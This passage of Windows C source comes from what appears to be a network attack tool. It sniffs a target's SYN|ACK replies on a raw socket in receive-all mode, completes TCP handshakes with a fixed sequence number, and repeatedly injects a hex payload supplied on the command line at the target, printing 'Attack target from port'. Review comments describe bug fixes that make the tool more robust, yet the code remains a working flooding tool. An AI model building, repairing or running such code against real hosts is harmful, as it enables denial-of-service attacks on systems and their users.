{
sendnum=0;
}
if (rect==SOCKET_ERROR)
{
printf("send error!:%x\n",WSAGetLastError());
return false;
}
else
{
printf(" Attack target from port %d \n", l);
}
}//end of while
Sleep(Interval);
}
pAtObj = pAtObj->Next;
}
return 0;
}
// Obtain the local host's IPv4 address
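// Return the last IPv4 address listed for the local host name (network byte
// order), or 0 (INADDR_ANY) when it cannot be determined.
//
// The original dereferenced the gethostbyname() result unconditionally and
// then indexed h_addr_list[--i]; with a NULL hostent that is a crash, and
// with an empty address list it reads h_addr_list[-1].  Every failure path
// now returns 0 instead.  Winsock must already be initialised (WSAStartup is
// not visible here; presumably done by the caller).
DWORD GetLocalIP()
{
    char hostName[256] = {0};
    if (gethostname(hostName, sizeof(hostName) - 1) == SOCKET_ERROR)
        return 0;

    struct hostent *he = gethostbyname(hostName);
    if (he == NULL || he->h_addr_list == NULL || he->h_addr_list[0] == NULL)
        return 0;
    // Only a 4-byte AF_INET address fits the DWORD return type.
    if (he->h_addrtype != AF_INET || he->h_length != (int)sizeof(DWORD))
        return 0;

    // Keep the original choice: the last address in the list.
    int last = 0;
    while (he->h_addr_list[last + 1] != NULL)
        last++;

    // memcpy instead of *(DWORD*) -- avoids a possibly misaligned, aliasing deref.
    DWORD ip = 0;
    memcpy(&ip, he->h_addr_list[last], sizeof(ip));
    return ip;
}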
// Compute the Internet (one's-complement) checksum
// One's-complement Internet checksum (RFC 1071) over `size` bytes starting at
// `buffer`; the complemented 16-bit sum is what goes into the IP/TCP header.
//
// Whole 16-bit words are summed in host order.  A trailing odd byte is added
// as-is, which lands it in the low half of the accumulator -- correct on the
// little-endian host this Winsock code targets (a big-endian host would need
// it in the high half).  `size` <= 0 yields 0xFFFF (complement of an empty sum).
USHORT checksum(USHORT *buffer, int size)
{
    unsigned long acc = 0;
    int remaining = size;

    // Sum full 16-bit words.
    for (; remaining > 1; remaining -= (int)sizeof(USHORT))
        acc += *buffer++;

    // Odd trailing byte, if any.
    if (remaining)
        acc += *(UCHAR *)buffer;

    // Fold the carries back in; the first fold can itself produce a carry.
    acc = (acc >> 16) + (acc & 0xffff);
    acc += acc >> 16;
    return (USHORT)(~acc);
}
// Listener (sniffer) thread function
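// Sniffer thread: opens a raw IP socket bound to the local address passed in
// `lpvoid` (an IPv4 address in network order carried inside the LPVOID),
// switches it to receive-all mode and reacts to TCP segments from TargetIP:
// a SYN|ACK whose ack number matches our ISN gets the third handshake
// packet plus a first data segment, a plain ACK gets another data segment.
//
// Returns 0 only if the endless capture loop ever ends; returns 1 when the
// raw socket cannot be created, bound or put into SIO_RCVALL mode.  The
// original called exit(0) from inside this worker thread on bind failure and
// ignored WSAIoctl's result; both are reported and returned now, with the
// socket closed.  Raw sockets + SIO_RCVALL require an elevated process.
//
// Depends on file-scope state defined elsewhere: TargetIP, psend, len and
// (through SendData) sock.
DWORD WINAPI ListeningFunc(LPVOID lpvoid)
{
    // The caller smuggles a DWORD through the LPVOID; cast via a
    // pointer-sized integer so the truncation is explicit on 64-bit builds.
    const DWORD localIP = (DWORD)(size_t)lpvoid;
    // Hoisted out of the receive loop: the target never changes.
    const DWORD targetIP = inet_addr(TargetIP);

    SOCKET rawsock = socket(AF_INET, SOCK_RAW, IPPROTO_IP);
    if (rawsock == INVALID_SOCKET)
    {
        printf("Sniffer Socket Setup Error!\n");
        return 1;
    }

    SOCKADDR_IN addr_in = {0};
    addr_in.sin_family = AF_INET;
    addr_in.sin_port = htons(8288);
    addr_in.sin_addr.S_un.S_addr = localIP;
    if (bind(rawsock, (struct sockaddr *)&addr_in, sizeof(addr_in)) == SOCKET_ERROR)
    {
        printf("bind failed: %d\n", WSAGetLastError());
        closesocket(rawsock);
        return 1;
    }

    // SIO_RCVALL: deliver every packet the interface sees, not just those
    // addressed to this socket.  Without it the loop never sees the target's
    // SYN|ACKs, so a failure here is fatal rather than silently ignored.
    DWORD enable = 1;
    DWORD bytesReturned = 0;
    if (WSAIoctl(rawsock, SIO_RCVALL, &enable, sizeof(enable),
                 NULL, 0, &bytesReturned, NULL, NULL) == SOCKET_ERROR)
    {
        printf("SIO_RCVALL failed: %d\n", WSAGetLastError());
        closesocket(rawsock);
        return 1;
    }

    while (TRUE)
    {
        SOCKADDR_IN from = {0};
        int fromLen = sizeof(from);
        // 256 bytes is enough for the flag-only SYN|ACK / ACK segments this
        // loop acts on; a larger datagram is reported by Winsock as an error
        // (WSAEMSGSIZE) and simply skipped, as in the original.
        char recvBuf[256] = {0};

        int got = recvfrom(rawsock, recvBuf, sizeof(recvBuf), 0,
                           (struct sockaddr *)&from, &fromLen);
        if (got == SOCKET_ERROR)
            continue;

        // Never interpret header bytes that were not actually received.
        if ((size_t)got < sizeof(IPHEADER))
            continue;
        const IPHEADER *ip = (const IPHEADER *)recvBuf;
        if (ip->proto != IPPROTO_TCP || ip->sourceIP != targetIP)
            continue;

        // Low nibble of h_verlen is the IHL in 32-bit words (SendData builds
        // the field the same way); honour it so IP options do not shift the
        // TCP header, and make sure the whole TCP header was received.
        const size_t ipHdrLen = (size_t)(ip->h_verlen & 0x0F) * 4;
        if (ipHdrLen < sizeof(IPHEADER) || (size_t)got < ipHdrLen + sizeof(TCPHEADER))
            continue;
        const TCPHEADER *tcp = (const TCPHEADER *)(recvBuf + ipHdrLen);

        if (tcp->th_flag == 0x12)               // SYN|ACK from an open port
        {
            // 0x00198289 is presumably the ISN used by the SYN sender
            // (set elsewhere in this file) -- only our own handshakes are
            // completed.  TODO confirm against the SYN-sending code.
            if (tcp->th_ack == htonl(0x00198289))
            {
                // Third handshake packet (bare ACK) ...
                SendData(tcp->th_ack, htonl(ntohl(tcp->th_seq) + 1),
                         tcp->th_dport, tcp->th_sport, ip->destIP, ip->sourceIP,
                         NULL, FALSE, 0);
                // ... followed by the first data segment.
                SendData(tcp->th_ack, htonl(ntohl(tcp->th_seq) + 1),
                         tcp->th_dport, tcp->th_sport, ip->destIP, ip->sourceIP,
                         psend, TRUE, len);
            }
        }
        else if (tcp->th_flag == 0x10)          // plain ACK: keep sending
        {
            SendData(tcp->th_ack, tcp->th_seq,
                     tcp->th_dport, tcp->th_sport, ip->destIP, ip->sourceIP,
                     psend, TRUE, len);
        }
    }
    // Unreachable; keeps the function well-formed for compilers that warn.
    return 0;
}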
// Packet-sending function
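// Build one TCP/IP segment and inject it through the file-scope raw socket
// `sock` (IP header included; its checksum is left 0 for the stack to fill).
//
//   SEQ, ACK      sequence / acknowledgement numbers, network byte order
//   SPort, APort  source / destination ports, network byte order
//   SIP, AIP      source / destination IPv4 addresses, network byte order
//   pBuf, dwSize  optional payload; NULL means no payload bytes are sent
//   Isdata        FALSE -> flag 0x10 (ACK), TRUE -> 0x18 (PSH|ACK)
//
// Fixes versus the original:
//   * dwSize is checked against the fixed 1024-byte stack buffer before any
//     memcpy.  `len` ultimately comes from the command line via ConvertOpt,
//     so an over-long hex string was a stack buffer overflow here.
//   * The pseudo-header carries the real TCP length (header + payload) as
//     RFC 793 requires.  The original used the header-only length and then
//     subtracted dwSize from the finished checksum, which is off by one
//     whenever that subtraction borrows.
//   * total_len no longer counts dwSize when pBuf is NULL.
//
// NOTE(review): raw sends with a caller-supplied IP header need an elevated
// process, and current Windows versions restrict TCP over SOCK_RAW -- verify
// on the deployment target.
void SendData(DWORD SEQ, DWORD ACK, USHORT SPort, USHORT APort, DWORD SIP, DWORD AIP, char* pBuf, BOOL Isdata, DWORD dwSize)
{
    IPHEADER ipHeader = {0};
    TCPHEADER tcpHeader = {0};
    PSDHEADER psdHeader = {0};
    char szSendBuf[1024] = {0};

    // No payload pointer means no payload bytes, whatever dwSize says.
    const DWORD payloadLen = (pBuf != NULL) ? dwSize : 0;

    // The checksum scratch (pseudo + TCP + data) and the wire image
    // (IP + TCP + data) share szSendBuf; bound the payload by the larger of
    // the two header prefixes.
    const size_t maxPrefix =
        (sizeof(psdHeader) > sizeof(ipHeader) ? sizeof(psdHeader) : sizeof(ipHeader))
        + sizeof(tcpHeader);
    if (payloadLen > sizeof(szSendBuf) - maxPrefix)
    {
        printf("SendData: payload of %lu bytes exceeds the %lu-byte limit\n",
               (unsigned long)payloadLen,
               (unsigned long)(sizeof(szSendBuf) - maxPrefix));
        return;
    }

    SOCKADDR_IN addr_in = {0};
    addr_in.sin_family = AF_INET;
    addr_in.sin_port = APort;
    addr_in.sin_addr.S_un.S_addr = AIP;

    // IP header: version 4, IHL in 32-bit words, DF set (0x0040 here is
    // 0x4000 on the wire), TTL 128.
    ipHeader.h_verlen = (4 << 4 | sizeof(ipHeader) / sizeof(unsigned long));
    ipHeader.tos = 0;
    ipHeader.total_len = htons((USHORT)(sizeof(ipHeader) + sizeof(tcpHeader) + payloadLen));
    ipHeader.ident = 1;
    ipHeader.frag_and_flags = 0x0040;
    ipHeader.ttl = 0x80;
    ipHeader.proto = IPPROTO_TCP;
    ipHeader.checksum = 0;
    ipHeader.sourceIP = SIP;
    ipHeader.destIP = AIP;

    // TCP header; checksum computed below.
    tcpHeader.th_sport = SPort;
    tcpHeader.th_dport = APort;
    tcpHeader.th_seq = SEQ;
    tcpHeader.th_ack = ACK;
    tcpHeader.th_lenres = (sizeof(tcpHeader) / 4 << 4 | 0);
    tcpHeader.th_flag = Isdata ? 0x18 : 0x10;   // PSH|ACK : ACK
    tcpHeader.th_win = htons(0x4470);
    tcpHeader.th_sum = 0;
    tcpHeader.th_urp = 0;

    // Pseudo-header for the TCP checksum; tcpl covers header AND payload.
    psdHeader.saddr = ipHeader.sourceIP;
    psdHeader.daddr = ipHeader.destIP;
    psdHeader.mbz = 0;
    psdHeader.ptcl = IPPROTO_TCP;
    psdHeader.tcpl = htons((USHORT)(sizeof(tcpHeader) + payloadLen));

    size_t off = 0;
    memcpy(szSendBuf + off, &psdHeader, sizeof(psdHeader)); off += sizeof(psdHeader);
    memcpy(szSendBuf + off, &tcpHeader, sizeof(tcpHeader)); off += sizeof(tcpHeader);
    if (payloadLen)
    {
        memcpy(szSendBuf + off, pBuf, payloadLen); off += payloadLen;
    }
    tcpHeader.th_sum = checksum((USHORT *)szSendBuf, (int)off);

    // Wire image: IP header, TCP header (now with checksum), payload.
    off = 0;
    memcpy(szSendBuf + off, &ipHeader, sizeof(ipHeader)); off += sizeof(ipHeader);
    memcpy(szSendBuf + off, &tcpHeader, sizeof(tcpHeader)); off += sizeof(tcpHeader);
    if (payloadLen)
    {
        memcpy(szSendBuf + off, pBuf, payloadLen); off += payloadLen;
    }

    int rect = sendto(sock, szSendBuf, (int)off, 0,
                      (struct sockaddr *)&addr_in, sizeof(addr_in));
    if (rect == SOCKET_ERROR)
    {
        printf("send error!:%x\n", WSAGetLastError());
        return;
    }
    if (pBuf != NULL)
        printf("SendData ok %d\n", ntohs(SPort));
    else
        printf(" SendAck ok %d\n", ntohs(SPort));
}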
// Convert the payload string from hex text to raw bytes
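// Value of one ASCII hex digit (either case), or -1 if `c` is not one.
static int hexNibble(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

// Decode the hex string `pu` (two hex digits per byte) into the file-scope
// payload: outflowbuf receives the bytes and optlen their count.  Any buffer
// left by a previous call is released first (assumes outflowbuf is NULL or
// a prior malloc() from this function -- it is only ever assigned here).
//
// Fixes versus the original:
//   * '9' decoded as 2 (the test was `< '9'`, so '9' took the 0x37 branch)
//     and lowercase a-f produced garbage; a real nibble lookup is used now.
//   * An odd-length string read the terminating NUL as a digit and wrote
//     one byte past the malloc'ed block.
//   * malloc() was unchecked.
//
// On bad input (NULL, odd length, non-hex character) or allocation failure an
// error is printed and optlen stays 0 with outflowbuf NULL, so code that
// sends optlen bytes from outflowbuf sends nothing rather than garbage.  An
// empty string is a valid zero-length payload.
void ConvertOpt (CHAR* pu)
{
    free(outflowbuf);
    outflowbuf = NULL;
    optlen = 0;

    if (pu == NULL)
    {
        printf("ConvertOpt: no payload string\n");
        return;
    }
    const size_t textLen = strlen(pu);
    if ((textLen % 2) != 0)
    {
        printf("ConvertOpt: payload must be an even number of hex digits\n");
        return;
    }
    if (textLen == 0)
        return;

    const size_t byteLen = textLen / 2;
    UCHAR *out = (UCHAR *)malloc(byteLen);
    if (out == NULL)
    {
        printf("ConvertOpt: out of memory\n");
        return;
    }

    for (size_t k = 0; k < byteLen; k++)
    {
        const int hi = hexNibble((unsigned char)pu[2 * k]);
        const int lo = hexNibble((unsigned char)pu[2 * k + 1]);
        if (hi < 0 || lo < 0)
        {
            printf("ConvertOpt: '%c%c' is not a hex byte\n", pu[2 * k], pu[2 * k + 1]);
            free(out);
            return;
        }
        out[k] = (UCHAR)((hi << 4) | lo);
    }

    outflowbuf = out;
    optlen = (int)byteLen;
}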